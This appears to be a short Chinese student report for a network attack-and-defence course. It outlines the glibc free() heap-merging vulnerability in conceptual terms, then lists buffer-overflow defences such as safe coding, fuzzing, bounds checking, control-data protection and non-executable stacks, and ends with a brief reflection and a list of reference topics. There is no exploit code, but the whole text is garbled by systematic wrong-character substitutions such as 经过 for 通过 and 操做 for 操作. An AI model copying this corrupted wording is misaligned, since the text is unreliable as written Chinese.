Linux下堆管理 glibc 库 free() 函数自己漏洞:Linux操做系统的堆管理是经过 glibc 库来实现的。其中对于堆管理的算法称为 dlmalloc。其经过称为 Bin 的双向循环链表来保存内存空闲块的信息。glibc 库中的 free 函数在内存回收的过程当中,须要将已经释放的空闲块和与之相邻的空闲块进行合并。经过精心构造空闲块,在空闲块合并的过程当中,将会发生位置覆盖。
尝试杜绝溢出的防护技术:解决缓冲区溢出攻击最根本的方法是编写正确的、不存在缓冲区溢出安全漏洞的软件代码,但因为C/C++语言做为效率优先的语言,很容易就会出现缓冲区溢出;尝试经过Fuzz等注入测试的方法来寻找程序漏洞,可是这不能找到全部的漏洞;或者经过在编译器上引入针对缓冲区的边界检查保护机制。
容许溢出但不让程序改变执行流程的防护技术:这种防护技术容许溢出发生,但对可能影响到程序流程的关键数据结构实施严密的安全保护,不让程序改变其执行流程,从而阻断溢出攻击。
没法让攻击代码执行的防护技术:这种防护技术尝试解决冯·诺依曼体系的本质缺陷,经过堆栈不可执行限制来防护缓冲区溢出攻击。
无
首先感谢老师体谅咱们,其次因为对 linux 系统结构和汇编语言的知识不太熟悉,又去上网搜集了一些资料学习而且翻了翻本身之前写过的博客,但仍是感受理解的不够深刻,仍是要多学习
网络攻防技术与实践
经常使用的汇编语言指令
不一样状况下的高地址与低地址
execl()函数与execlp()函数